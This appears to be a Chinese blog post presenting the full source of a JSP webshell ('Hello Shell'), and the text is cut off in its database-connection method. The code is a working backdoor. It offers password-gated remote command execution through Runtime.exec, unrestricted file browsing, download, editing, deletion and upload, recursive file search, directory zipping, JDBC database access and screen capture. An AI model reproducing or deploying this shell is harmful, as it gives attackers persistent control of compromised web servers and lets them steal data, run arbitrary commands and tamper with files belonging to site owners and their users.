漂亮的JSP木马




纯粹手痒,写一个jsp木马。代码如下:

   1 <%@ page contentType="text/html; charset=utf-8"%>
   2 <%@ page import="java.io.*"%>
   3 <%@ page import="java.util.*"%>
   4 <%@ page import="java.nio.charset.Charset"%>
   5 <%@ page import="java.util.regex.*"%>
   6 <%@ page import="java.sql.*"%>
   7 <%@ page import="java.util.zip.ZipEntry"%>
   8 <%@ page import="java.util.zip.ZipOutputStream"%>
   9 <%@ page import="java.text.DecimalFormat"%>
  10 <%@ page import="java.net.InetAddress"%>
  11 <%@ page import="java.awt.Dimension"%>
  12 <%@ page import="java.awt.Toolkit"%>
  13 <%@ page import="java.awt.image.BufferedImage"%>
  14 <%@ page import="java.awt.Rectangle"%>
  15 <%@ page import="java.awt.Robot"%>
  16 <%@ page import="javax.imageio.ImageIO"%>
  17 <%!
  18     /*
  19      * Code by Kenn
  20      * QQ: 921506
  21      */
    // Login password, hard-coded in the page source; the comparison that uses it is
    // outside this chunk.
    private String myPassword = "hello";
    private String shellName = "Hello Shell"; //title
    /*
     * Icon glyph; presumably rendered on the login page (use is outside this chunk).
     * Skull: U+2620, star and crescent: U+262A, alien (surrogate pair D83D DC7D): U+1F47D.
     */
    private String loginIcon = "\\u2620";
    private int sessionOutTime = 30; //minutes, applied outside this chunk
    private static String language = "ENG"; //default language: ENG or CHN;
    // Charset name that Unicode2GB re-decodes request text with.
    private String encodeType = "utf8";
    /**
     * Greeting shown on the login page, in the configured language.
     *
     * @return the English or Chinese greeting, as chosen by {@code language}
     */
    public static String welcomeMsg(){
        String english = "Welcome for coming";
        String chinese = "你丫又来了";
        // the two-argument overload also registers the pair in textMap
        return orChinese(english, chinese);
    }
  35 
    /** Per-file actions rendered as links by MyFile.setHtmlOperation. */
    private enum Operation{Edit,Delete,Rename,Download;}
    private String curPath;
    // Not read or written anywhere in this chunk; DBExecute tests conn/dbStatement instead.
    private boolean isDBconnected = false;
    // JDBC handles opened by DBConnect; no close() call is visible in this chunk.
    private Connection conn = null;
    private Statement dbStatement = null;
  41 
    // English UI label -> Chinese translation; filled once by initMap() and read by orChinese().
    private static Map<String,String> textMap = null;
    
    // Runs at class load so textMap is populated before any request handling.
    static{
        initMap();
    }
  47 
    /**
     * Builds the English-to-Chinese label table on first call; later calls are no-ops.
     * Not synchronized — the static initializer is the only caller visible here.
     * Note that "Yes" and "No" map to the empty string.
     */
    public static void initMap(){
        if (textMap != null) {
            return;
        }
        String[][] entries = {
            {"Environment", "系统环境"},
            {"File Manager", "文件管理"},
            {"File Search", "文件搜索"},
            {"Command", "命令行"},
            {"Database", "数据库"},
            {"Screen Capture", "屏幕采集"},
            {"Logoff", "退出"},
            {"OS", "操作系统"},
            {"Computer Name", "计算机名"},
            {"Available Processors", "处理器可用核心数"},
            {"IP", "IP地址"},
            {"System Driver", "系统盘符"},
            {"Driver Info", "磁盘信息"},
            {"User Name", "用户名"},
            {"User DNS Domain", "用户域"},
            {"User Domain", "帐户的域名称"},
            {"User Profile", "用户目录"},
            {"All User Profile", "用户公共目录"},
            {"Temp", "用户临时文件目录"},
            {"Program Files", "默认程序目录"},
            {"AppData", "应用程序数据目录"},
            {"System Root", "系统启动目录"},
            {"Console", "控制台"},
            {"File Executable", "可执行后缀"},
            {"My Path", "本程序绝对路径"},
            {"User Dir", "当前用户工作目录"},
            {"Protocol", "网络协议"},
            {"Server Info", "服务器软件版本信息"},
            {"JDK Version", "JDK版本"},
            {"JDK Home", "JDK安装路径"},
            {"JVM Version", "JAVA虚拟机版本"},
            {"JVM Name", "JAVA虚拟机名"},
            {"Class Path", "JAVA类路径"},
            {"Java Library Path", "JAVA载入库搜索路径"},
            {"Java tmpdir", "JAVA临时目录"},
            {"Compiler", "JIT编译器名"},
            {"Java ext dirs", "扩展目录路径"},
            {"Remote Addr", "客户机地址"},
            {"Remote Host", "客户机器名"},
            {"Remote User", "客户机用户名"},
            {"Scheme", "请求方式"},
            {"Secure", "应用安全套接字层"},
            {"Yes", ""},
            {"No", ""},
            {"Edit", "编辑"},
            {"Delete", "删除"},
            {"Rename", "重命名"},
            {"Download", "下载"},
            {"File Name", "文件名"},
            {"Size", "大小"},
            {"Operation", "操作"},
            {"GOTO", "跳转"},
            {"Home", "家目录"},
            {"Select", "选择"},
            {"Upload", "上传"},
            {"Create File", "创建文件"},
            {"Create Folder", "创建文件夹"},
            {"Wrong Password", "密码错误"},
            {"Folder name is null", "文件夹名为空"},
            {"Content is null", "内容为空"},
            {"File name is null", "文件名为空"},
            {"Search from", "搜索目录"},
            {"Search for file type", "文件的后缀名"},
            {"Setting", "设置"},
            {"Search by Name", "按名称搜索"},
            {"Search by Content", "按内容搜索"},
            {"Ignore Case", "忽略大小写"},
            {"Search keyword", "关键词"},
            {"Search", "搜索"},
            {"Execute", "执行"},
            {"Connect", "连接"},
            {"Disconnect", "断开"},
            {"Database Type", "数据库类型"},
            {"Driver", "驱动程序"},
            {"Host", "主机地址"},
            {"Port", "端口号"},
            {"DB Name", "数据库名"},
            {"Username", "用户名"},
            {"Password", "密码"},
            {"SQL", "SQL语句"},
            {"File is already exist", "文件已存在"},
            {"Folder is empty", "文件夹为空"},
            {"Bad command", "错误的命令"},
            {"Save", "保存"},
            {"Return Back", "返回"},
            {"is not a text file", "不是文本文件"},
            {"File can not be writed", "文件不可写"},
            {"Save success", "保存成功"},
            {"Exception", "异常"},
            {"Folder already exist", "文件夹已存在"},
            {"File already exist", "文件已存在"},
            {"File upload success", "文件上传成功"},
            {"File upload failed", "文件上传失败"},
            {"connect failed", "连接失败"},
            {"connect success", "连接成功"},
            {"Can not connect to database", "不能连接到数据库"},
            {"Invalid SQL", "无效的SQL"},
            {"result", "结果"},
            {"SQL execute failed", "SQL执行失败"},
            {"SQL execute success", "SQL执行成功"},
            {"Free, Total", "可用,共"},
            {"Please input new name", "请输入新的名字"},
            {"Name can not be null", "名字不可为空"},
            {"Refresh", "刷新"}
        };
        Map<String,String> table = new HashMap<String,String>();
        for (String[] entry : entries) {
            table.put(entry[0], entry[1]);
        }
        textMap = table;
    }
    /**
     * Resolves a UI label for the current language.
     *
     * @param key the English label
     * @return {@code key} itself unless {@code language} is "CHN" (case-insensitive), in which
     *         case the table lookup — which is {@code null} for an unregistered key
     */
    public static String orChinese(String key){
        boolean chinese = "CHN".equalsIgnoreCase(language);
        if (!chinese) {
            return key;
        }
        return textMap.get(key);
    }
    /**
     * Registers a translation pair and returns the one matching the current language.
     * Side effect: {@code textMap} is updated (overwriting any earlier value) on every call.
     *
     * @param english the label used as the key
     * @param chinese its translation
     * @return {@code chinese} when {@code language} is "CHN" (case-insensitive), else {@code english}
     */
    public static String orChinese(String english, String chinese){
        textMap.put(english, chinese);
        // after the put, a lookup of english yields exactly chinese
        return "CHN".equalsIgnoreCase(language) ? chinese : english;
    }
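    /**
     * Lists the immediate sub-directories of {@code path}.
     *
     * @param path directory to list
     * @return its sub-directories in {@code listFiles} order; empty when {@code path} does not
     *         exist, is not a directory, or cannot be read
     */
    public List<File> getFolderList(String path) {
        List<File> rtnList = new ArrayList<File>();
        File file = new File(path);
        if (file.exists() && file.isDirectory()) {
            File[] listFiles = file.listFiles(new FileFilter() {
                public boolean accept(File pathname) {
                    return pathname.isDirectory();
                }
            });
            // listFiles() returns null on an I/O error or an unreadable directory;
            // Arrays.asList(null) would throw here
            if (listFiles != null) {
                Collections.addAll(rtnList, listFiles);
            }
        }
        return rtnList;
    }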
 179 
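    /**
     * Lists the regular files directly inside {@code path}.
     *
     * @param path directory to list
     * @return its files in {@code listFiles} order; empty when {@code path} does not exist,
     *         is not a directory, or cannot be read
     */
    public List<File> getFileList(String path) {
        List<File> rtnList = new ArrayList<File>();
        File file = new File(path);
        if (file.exists() && file.isDirectory()) {
            File[] listFiles = file.listFiles(new FileFilter() {
                public boolean accept(File pathname) {
                    return pathname.isFile();
                }
            });
            // listFiles() returns null on an I/O error or an unreadable directory;
            // Arrays.asList(null) would throw here
            if (listFiles != null) {
                Collections.addAll(rtnList, listFiles);
            }
        }
        return rtnList;
    }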
 193 
    /**
     * A {@link File} that also carries the HTML action links rendered next to it in the
     * file-manager listing. As a non-static inner class it holds a reference to the enclosing
     * page instance.
     */
    public class MyFile extends File {

        private String htmlOperation;
        private String requestUrl;

        /**
         * @param pathname   file system path of the entry
         * @param requestUrl base URL that action links are appended to (with "&amp;" parameters)
         */
        public MyFile(String pathname, String requestUrl) {
            super(pathname);
            this.requestUrl = requestUrl;
        }

        /** @return HTML built by the last {@link #setHtmlOperation} call, or null before it */
        public String getHtmlOperation() {
            return htmlOperation;
        }

        /**
         * Renders one link per operation. The file name and URL are inserted into the HTML
         * without escaping. For Rename the URL is emitted after {@code rename(} with no opening
         * quote, exactly as before.
         */
        public void setHtmlOperation(Operation... Opers) {
            StringBuilder html = new StringBuilder();
            for (Operation op : Opers) {
                String actionUrl = requestUrl + "&fsAction=" + op + "&fileName=" + this.getName();
                html.append("&nbsp;<a href=\"");
                if (op.equals(Operation.Rename)) {
                    html.append("#\" onclick=\"rename(").append(actionUrl).append("','")
                        .append(orChinese("Please input new name")).append("','")
                        .append(orChinese("Name can not be null")).append("')\">");
                } else {
                    html.append(actionUrl).append("\">");
                }
                html.append(orChinese(op.toString())).append("</a>&nbsp;");
            }
            this.htmlOperation = html.toString();
        }

        /** @return the human-readable size, or "" for a directory */
        public String getLength() {
            return this.isDirectory() ? "" : getSize(this.length());
        }
    }
 229 
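    /**
     * Formats a byte count with two decimals and a binary unit (1024 steps) up to TB.
     *
     * @param size byte count; anything below 1 KB, including negative values, is printed in bytes
     * @return e.g. {@code "1.50 KB"}; the byte form keeps its original trailing space ({@code " B "})
     */
    public static String getSize(long size) {
        DecimalFormat df = new DecimalFormat("0.00");
        // double instead of float: float has a 24-bit mantissa, so sizes above 16 MB were
        // already rounded before the division
        double value = (double) size;
        if (size >= (1L << 40))
            return df.format(value / 1024 / 1024 / 1024 / 1024) + " TB";
        if (size >= (1L << 30))
            return df.format(value / 1024 / 1024 / 1024) + " GB";
        if (size >= (1L << 20))
            return df.format(value / 1024 / 1024) + " MB";
        if (size >= (1L << 10))
            return df.format(value / 1024) + " KB";
        return df.format(value) + " B ";
    }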
 243 
    /**
     * Streams the file at {@code path} to the client as an attachment.
     *
     * <p>Nothing restricts {@code path}: any file the servlet process can read is served.
     * The whole file is read into one byte[] sized by {@code available()}, so a large file
     * exhausts the heap, and the return value of {@code read} is ignored, so a short read
     * is sent truncated. {@code ext} is computed but never used.
     *
     * @param path     file to send, as chosen by the caller
     * @param response response to write to; it is reset before headers are added
     * @throws Exception any IOException is rethrown unchanged
     */
    public void download(String path, HttpServletResponse response) throws Exception {
        try {
            File file = new File(path);
            String filename = file.getName();
            String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase();
            InputStream fis = new BufferedInputStream(new FileInputStream(path));
            byte[] buffer = new byte[fis.available()];
            fis.read(buffer);
            fis.close();
            response.reset();
            // filename bytes taken in the platform charset and relabelled as ISO-8859-1
            response.addHeader("Content-Disposition",
                    "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1"));
            response.addHeader("Content-Length", "" + file.length());
            OutputStream toClient = new BufferedOutputStream(response.getOutputStream());
            response.setContentType("application/octet-stream");
            toClient.write(buffer);
            toClient.flush();
            toClient.close();
        } catch (IOException ex) {
            // rethrown as-is; the catch only narrows nothing
            throw ex;
        }
    }
 266 
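    /**
     * Zips the directory {@code sourcePath} (the directory itself becomes the top-level entry)
     * into a new archive at {@code zipPath}.
     *
     * @param sourcePath directory to archive
     * @param zipPath    archive to create; must not exist yet
     * @return the created archive
     * @throws Exception if the archive exists already, if {@code sourcePath} is missing, is not
     *         a directory or is empty, or on any I/O failure while writing
     */
    public static File createZip(String sourcePath, String zipPath) throws Exception {
        File zipFile = new File(zipPath);
        if (zipFile.exists()) {
            throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName());
        }
        File srcFolder = new File(sourcePath);
        // listFiles() is null for a plain file or an unreadable directory; the original
        // dereferenced it and threw NullPointerException for those inputs
        File[] children = srcFolder.listFiles();
        if (!srcFolder.exists() || children == null || children.length == 0) {
            throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName());
        }
        FileOutputStream fos = null;
        ZipOutputStream zos = null;
        try {
            fos = new FileOutputStream(zipPath);
            zos = new ZipOutputStream(fos);
            writeZip(srcFolder, "", zos);
            return zipFile;
        } finally {
            // ZipOutputStream.close() writes the central directory and closes fos;
            // closing fos again afterwards is a harmless no-op
            if (zos != null)
                zos.close();
            if (fos != null)
                fos.close();
        }
    }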
 296 
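    /**
     * Recursively adds {@code file} to {@code zos}. Directories contribute their name to
     * {@code parentPath} (joined with {@link File#separator}, so entry names are
     * platform-dependent) and recurse; regular files become one entry each.
     *
     * @param file       file or directory to add; a missing path is silently skipped
     * @param parentPath entry-name prefix accumulated from the enclosing directories
     * @param zos        archive being written; left open
     * @throws Exception on any I/O failure
     */
    private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception {
        if (!file.exists())
            return;
        if (file.isDirectory()) {
            parentPath += file.getName() + File.separator;
            File[] files = file.listFiles();
            // null on an unreadable directory; the original iterated it and threw NPE
            if (files == null)
                return;
            for (File f : files) {
                writeZip(f, parentPath, zos);
            }
        } else {
            // The original wrapped the stream in an unused DataInputStream and read the raw
            // FileInputStream byte-by-chunk; reading through the buffer is the intent.
            InputStream in = null;
            try {
                in = new BufferedInputStream(new FileInputStream(file));
                zos.putNextEntry(new ZipEntry(parentPath + file.getName()));
                byte[] content = new byte[1024];
                int len;
                while ((len = in.read(content)) != -1) {
                    zos.write(content, 0, len);
                }
                zos.closeEntry();
            } finally {
                if (in != null)
                    in.close();
            }
        }
    }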
 334 
    /**
     * Runs {@code cmd} on the server via {@link Runtime#exec(String)} and returns its
     * standard output as HTML.
     *
     * <p>The command string is used exactly as received — nothing is validated or restricted —
     * which is what makes this the remote command-execution capability of the shell. Only
     * stdout is read (decoded as GB2312); stderr is never drained and the process is not
     * waited for, so a child that writes a lot to stderr can block.
     *
     * @param cmd command line; Runtime.exec(String) splits it on whitespace
     * @return HTML-encoded stdout, or a red "Bad command" message on any exception (the failing
     *         {@code cmd} is echoed into that HTML without encoding)
     */
    public String exeCmd(String cmd) {
        Runtime runtime = Runtime.getRuntime();
        Process proc = null;
        String retStr = "";
        InputStreamReader insReader = null;
        char[] tmpBuffer = new char[1024];
        int nRet = 0;

        try {
            proc = runtime.exec(cmd);
            insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));

            // a newline is appended per read() chunk, so line breaks follow buffer boundaries
            while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
                retStr += new String(tmpBuffer, 0, nRet) + "\\n";
            }
            insReader.close();
            retStr = HTMLEncode(retStr);
            return retStr;
        } catch (Exception e) {
            // insReader is not closed on this path
            retStr = "<font color=\\"red\\">" + orChinese("Bad command") + ": \\"" + cmd + "\\"</font>";
            return retStr;
        }
    }
 358 
    /**
     * Minimal HTML encoding used for command output and file contents: spaces become
     * {@code &nbsp;}, angle brackets become entities and CRLF becomes {@code <br>}.
     * Ampersands, quotes and bare LF are left untouched, so this is not a general escaper.
     *
     * @param str text to encode (must not be null)
     * @return the encoded text
     */
    public String HTMLEncode(String str) {
        // Same four substitutions in the same order; none of the patterns contains regex
        // metacharacters, so replace() matches the original replaceAll() exactly.
        String out = str.replace(" ", "&nbsp;");
        out = out.replace("<", "&lt;");
        out = out.replace(">", "&gt;");
        return out.replace("\r\n", "<br>");
    }
 366 
    /**
     * Re-decodes text that the container decoded as ISO-8859-1 using the page's
     * {@code encodeType} (despite the name, that is "utf8" by default, not GB).
     *
     * @param str request text, may be null
     * @return the re-decoded text; "" for null input; {@code str} unchanged if decoding fails
     */
    public String Unicode2GB(String str) {
        if (str == null) {
            return "";
        }
        try {
            byte[] raw = str.getBytes("ISO8859_1");
            return new String(raw, encodeType);
        } catch (Exception e) {
            // unsupported charset name or anything else: fall back to the input as-is
            return str;
        }
    }
 379 
    /**
     * Normalises a path for display and URL building: backslashes become forward slashes and
     * a trailing slash is added when the path has no parent (a root or bare name) or names an
     * existing directory.
     *
     * @param path file system path
     * @return the converted path
     */
    public String pathConvert(String path) {
        String converted = path.replace('\\', '/');
        File probe = new File(path);
        // a parent-less path always gets the slash; otherwise only a real directory does
        boolean wantsSlash = probe.getParent() == null || probe.isDirectory();
        if (wantsSlash && !converted.endsWith("/")) {
            converted += "/";
        }
        return converted;
    }
 394 
    /**
     * Runs the recursive search and renders the matches as one HTML line each.
     *
     * @param path       directory to search
     * @param content    text to look for in file names or file contents
     * @param subfix     space-separated list of file-name suffixes to consider
     * @param byname     true to match names, false to match contents
     * @param ignoreCase case-insensitive matching when true
     * @return absolute paths (with "/" separators) each followed by {@code <br>}
     */
    public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) {
        List<String> hits = new ArrayList<String>();
        searchFile(hits, path, content, subfix, byname, ignoreCase);
        StringBuilder html = new StringBuilder();
        for (String hit : hits) {
            html.append(hit.replace("\\", "/")).append("<br>");
        }
        return html.toString();
    }
 404 
    /**
     * Depth-first search under {@code path}, appending the absolute path of every regular file
     * whose name ends with one of the {@code subfix} entries and whose name (or, when
     * {@code byname} is false, content as read by {@link #readText}) contains {@code content}.
     * An empty suffix entry matches every file. Directories that cannot be listed are skipped.
     */
    private void searchFile(List<String> list, String path, String content, String subfix, boolean byname,
            boolean ignoreCase) {
        File dir = new File(pathConvert(path));
        if (!dir.exists() || !dir.isDirectory()) {
            return;
        }
        String[] names = dir.list();
        if (names == null || names.length == 0) {
            return;
        }
        String[] exts = subfix.split(" ");
        String needle = ignoreCase ? content.toUpperCase() : content;
        for (File entry : dir.listFiles()) {
            if (entry.isDirectory()) {
                searchFile(list, entry.getAbsolutePath(), content, subfix, byname, ignoreCase);
                continue;
            }
            String fname = entry.getName();
            if (!containsSubfix(fname, exts)) {
                continue;
            }
            // file content is only read for files that passed the suffix filter
            String haystack = byname ? fname : readText(entry);
            if (ignoreCase) {
                haystack = haystack.toUpperCase();
            }
            if (haystack.contains(needle)) {
                list.add(entry.getAbsolutePath());
            }
        }
    }
 434 
    /**
     * Case-insensitive suffix test.
     *
     * @param name    file name
     * @param subfixs candidate suffixes; null or empty means no match; an empty string entry
     *                matches any name
     * @return true if {@code name} ends with at least one entry
     */
    private boolean containsSubfix(String name, String[] subfixs) {
        if (subfixs == null || subfixs.length == 0) {
            return false;
        }
        String upperName = name.toUpperCase();
        for (String ext : subfixs) {
            if (upperName.endsWith(ext.toUpperCase())) {
                return true;
            }
        }
        return false;
    }
 446 
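    /**
     * Reads a file as GB2312 text with all line terminators removed (lines are concatenated).
     * Best effort: any failure is printed to stderr and whatever was read so far is returned,
     * so an unreadable file yields "".
     *
     * @param file file to read
     * @return the concatenated lines, possibly empty
     */
    public static String readText(File file) {
        StringBuilder sb = new StringBuilder();
        BufferedReader reader = null;
        try {
            reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312"));
            String line;
            while ((line = reader.readLine()) != null) {
                sb.append(line);   // readLine() strips the terminator; nothing re-adds it
            }
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            // reader stays null when opening failed; the original then hit an NPE here and
            // printed a second stack trace
            if (reader != null) {
                try {
                    reader.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
        return sb.toString();
    }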
 468 
    /**
     * Renders an edit form containing the text of {@code fileName} under {@code path}.
     *
     * <p>The file is read with {@link FileReader}, i.e. in the platform charset, and is not
     * closed when reading throws. {@code path}, {@code fileName} and {@code curUri} are
     * inserted into attributes without escaping; only the file body goes through
     * {@link #HTMLEncode} (with {@code <br>} turned back into CRLF). No check restricts which
     * file is opened.
     *
     * @param path     directory, normalised with pathConvert
     * @param fileName file inside it
     * @param curUri   base URL for the form action and the back link
     * @return the form HTML, or a red error message if the file cannot be read
     */
    public String openFile(String path, String fileName, String curUri) {
        String sRet = "";
        String fileString = null;
        File curFile = null;
        path = pathConvert(path);
        try {
            fileString = "";
            curFile = new File(path, fileName);
            FileReader fileReader = new FileReader(curFile);
            char[] chBuffer = new char[1024];
            int nRet;
            while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
                fileString += new String(chBuffer, 0, nRet);
            }
            // always true here: fileString was set to "" before the loop
            if (fileString != null) {
                sRet += "<table align=\\"center\\" width=\\"100%\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n";
                sRet += "    <form name=\\"openfile\\" method=\\"post\\" action=\\"" + curUri + "&curPath=" + path
                        + "&fsAction=save" + "\\">\\n";
                sRet += "    <input type=\\"hidden\\" name=\\"fileName\\" value=\\"" + fileName + "\\" />\\n";
                sRet += "    <tr>\\n";
                sRet += "        <td>[<a href=\\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\\">"
                        + orChinese("Return Back") + "</a>]</td>\\n";
                sRet += "    </tr>\\n";
                sRet += "    <tr>\\n";
                sRet += "        <td align=\\"left\\">\\n";
                sRet += "            <textarea name=\\"fileContent\\" class=\\"trans\\" style=\\"display:block;width:100%\\" rows=\\"32\\" >\\n";
                sRet += HTMLEncode(fileString).replace("<br>", "\\r\\n");
                sRet += "            </textarea>\\n";
                sRet += "        </td>\\n";
                sRet += "    </tr>\\n";
                sRet += "    <tr>\\n";
                sRet += "        <td align=\\"center\\"><input type=\\"submit\\" class=\\"trans\\" value=\\""
                        + orChinese("Save") + "\\" /></td>\\n";
                sRet += "    </tr>\\n";
                sRet += "    </form>\\n";
                sRet += "</table>\\n";
            }
            fileReader.close();
        } catch (IOException e) {
            // any read failure is reported as "not a text file"; path is echoed unescaped
            sRet = "<font color=\\"red\\">\\"" + path + "\\" " + orChinese("is not a text file") + "</font>";
        }
        return sRet;
    }
 512 
    /**
     * Overwrites {@code fileName} under {@code path} with {@code fileContent} and redirects
     * back to the listing.
     *
     * <p>The content is written with {@link FileWriter}, i.e. in the platform charset, and is
     * not closed if {@code write} throws. {@code canWrite()} is false for a file that does not
     * exist yet, so this only saves existing files. Nothing restricts the target path.
     *
     * @param path        directory, normalised with pathConvert
     * @param fileName    file inside it
     * @param curUri      base URL for the redirect
     * @param fileContent new contents
     * @return a success message plus a meta refresh, or a red error message
     */
    public String saveFile(String path, String fileName, String curUri, String fileContent) {
        String sRet = "";
        File file = null;

        path = pathConvert(path);

        try {
            file = new File(path, fileName);

            if (!file.canWrite()) {
                sRet = "<font color=\\"red\\">" + orChinese("File can not be writed") + "</font>";
            } else {
                FileWriter fileWriter = new FileWriter(file);
                fileWriter.write(fileContent);

                fileWriter.close();
                sRet = orChinese("Save success") + "!\\n";
                sRet += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + curUri + "&curPath=" + path
                        + "&fsAction=list\\" />\\n";
            }
        } catch (IOException e) {
            // exception text is echoed into the page unescaped
            sRet = "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
        }
        return sRet;
    }
 538 
    /**
     * Creates the directory {@code fileName} (including missing parents) under {@code path}
     * and redirects back to the listing.
     *
     * <p>The result of {@link File#mkdirs()} is ignored, so a failed creation still redirects
     * as if it succeeded. {@code fileName} may contain separators, so the new directory is
     * not confined to {@code path}.
     *
     * @return a message if the directory exists or on error, else a meta refresh to the listing
     */
    public String createFolder(String path, String fileName, String url) {
        try {
            File file = new File(path, fileName);
            if (file.exists())
                return orChinese("Folder already exist") + "!";
            else
                file.mkdirs();
        } catch (Exception e) {
            return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
        }
        return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
    }
 551 
    /**
     * Creates an empty file {@code fileName} under {@code path} and redirects back to the
     * listing.
     *
     * <p>The boolean from {@link File#createNewFile()} is ignored (it only returns false when
     * the file already exists, which is checked just before). {@code fileName} may contain
     * separators, so the new file is not confined to {@code path}.
     *
     * @return a message if the file exists or on error, else a meta refresh to the listing
     */
    public String createFile(String path, String fileName, String url) {
        try {
            File file = new File(path, fileName);
            if (file.exists())
                return orChinese("File already exist") + "!";
            else
                file.createNewFile();
        } catch (Exception e) {
            return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
        }
        return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
    }
 564 
    /**
     * Deletes {@code fileName} under {@code path} if it exists, then redirects to the listing.
     *
     * <p>The result of {@link File#delete()} is ignored, so a failed delete (non-empty
     * directory, permissions) is indistinguishable from success. Nothing restricts the path.
     *
     * @return a meta refresh back to the listing in every case
     */
    public String deleteFile(String path, String fileName, String url) {
        File file = new File(path, fileName);
        if (file.exists())
            file.delete();
        return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
    }
 571 
    /**
     * Sends {@code fileName} under {@code path} to the client; a directory is first zipped
     * to {@code &lt;dir&gt;.zip} beside itself on the server and that archive is sent.
     *
     * <p>The archive is left on disk afterwards (no cleanup is visible here). {@code url} and
     * {@code downFile} are unused.
     *
     * @return null if the file does not exist, "" on success, or the exception message on failure
     */
    public String download(String path, String fileName, String url, HttpServletResponse response) {
        String rtnStr = "";
        File file = new File(path, fileName);
        File downFile = null;
        if (!file.exists())
            return null;
        try {
            if (file.isDirectory()) {
                // createZip throws if <dir>.zip already exists, which becomes the returned message
                file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip");
            }
            download(file.getAbsolutePath(), response);
        } catch (Exception e) {
            rtnStr = e.getMessage();
        }
        return rtnStr;
    }
 588 
    /**
     * Renames {@code fileName} to {@code newFile} inside {@code path} and redirects to the
     * listing.
     *
     * <p>The boolean from {@link File#renameTo(File)} is ignored, so a failed rename looks like
     * success. {@code newFile} may contain separators, so the target is not confined to
     * {@code path}.
     *
     * @return a meta refresh back to the listing in every case
     */
    public String rename(String path, String fileName, String newFile, String url) {
        File file = new File(path, fileName);
        File nFile = new File(path, newFile);
        if (file.exists()) {
            file.renameTo(nFile);
        }
        return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />";
    }
 597 
    /**
     * Hand-rolled multipart/form-data upload: reads the whole request body into memory, pulls
     * the {@code filename="..."} value out of the first part's headers and writes that part's
     * bytes to {@code path + filename}.
     *
     * <p>Assumptions baked into the parsing: exactly one part, the boundary is the first line
     * (terminated by CR), the part headers end at the first CR x CR sequence, and the trailing
     * boundary has a fixed length — {@code end} is computed from the buffer length rather than
     * by searching for the closing boundary, so any other layout writes wrong bytes. The
     * filename is taken from the client verbatim and concatenated onto {@code path}, so the
     * written location is client-controlled. A negative or missing Content-Length makes the
     * buffer allocation throw. The final {@code in.read(inBytes, start, 1024)} asks for more
     * room than remains in the array; whether that throws depends on the container's stream —
     * TODO confirm against the target servlet implementation. RuntimeExceptions from any of
     * this escape, since only IOException is caught.
     *
     * @param request request whose body is the multipart payload
     * @param path    destination directory, normalised with pathConvert
     * @param curUri  base URL for the redirect
     * @return a script alert (success or failure) followed by a meta refresh
     */
    public String uploadFile(ServletRequest request, String path, String curUri) {
        String sRet = "";
        File file = null;
        InputStream in = null;
        path = pathConvert(path);
        try {
            in = request.getInputStream();
            byte[] inBytes = new byte[request.getContentLength()];
            int nBytes;
            int start = 0;
            int end = 0;
            int size = 1024;
            String token = null;
            String filePath = null;
            while ((nBytes = in.read(inBytes, start, size)) != -1) {
                start += nBytes;
            }
            in.close();
            int i = 0;
            byte[] seperator;

            // boundary line: everything before the first CR
            while (inBytes[i] != 13) {
                i++;
            }
            seperator = new byte[i];

            for (i = 0; i < seperator.length; i++) {
                seperator[i] = inBytes[i];
            }
            String dataHeader = null;
            i += 3;
            start = i;
            // part headers run until a CR x CR pattern (blank line before the body)
            while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) {
                i++;
            }
            end = i - 1;
            dataHeader = new String(inBytes, start, end - start + 1);
            token = "filename=\\"";
            start = dataHeader.indexOf(token) + token.length();
            token = "\\"";
            end = dataHeader.indexOf(token, start) - 1;
            filePath = dataHeader.substring(start, end + 1);
            i += 4;
            start = i;
            // body end assumed at a fixed distance from the buffer end (closing boundary + CRLFs)
            end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
            File newFile = new File(path + filePath);
            newFile.createNewFile();
            FileOutputStream out = new FileOutputStream(newFile);
            out.write(inBytes, start, end - start + 1);
            out.close();

            sRet = "<script language=\\"javascript\\">\\n";
            sRet += "alert(\\"" + orChinese("File upload success") + "! " + filePath + "\\");\\n";
            sRet += "</script>\\n";
        } catch (IOException e) {
            sRet = "<script language=\\"javascript\\">\\n";
            sRet += "alert(\\"" + orChinese("File upload failed") + "!\\");\\n";
            sRet += "</script>\\n";
        }

        sRet += "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + curUri + "&curPath=" + path + "\\" />";
        return sRet;
    }
 661 
    /**
     * Opens a JDBC connection with the caller-supplied URL and credentials and keeps it, plus
     * a Statement, in the page-level fields {@code conn} / {@code dbStatement} for DBExecute.
     *
     * <p>A previous connection is overwritten without being closed. {@code isDBconnected} is
     * not updated. The driver must already be loadable by DriverManager. On failure the
     * SQLException message (which may include connection details) is returned to the page.
     *
     * @param url      JDBC URL; null skips the attempt
     * @param username optional; blank means connect with the URL alone
     * @param password password for {@code username}
     * @return the localised "connect success" or "connect failed" text
     */
    public String DBConnect(String url, String username, String password) {
        String bRet = orChinese("connect failed");
        if (url != null) {
            try {
                if (username != null && username.trim().length() > 0) {
                    conn = DriverManager.getConnection(url, username, password);
                } else {
                    conn = DriverManager.getConnection(url);
                }
                dbStatement = conn.createStatement();
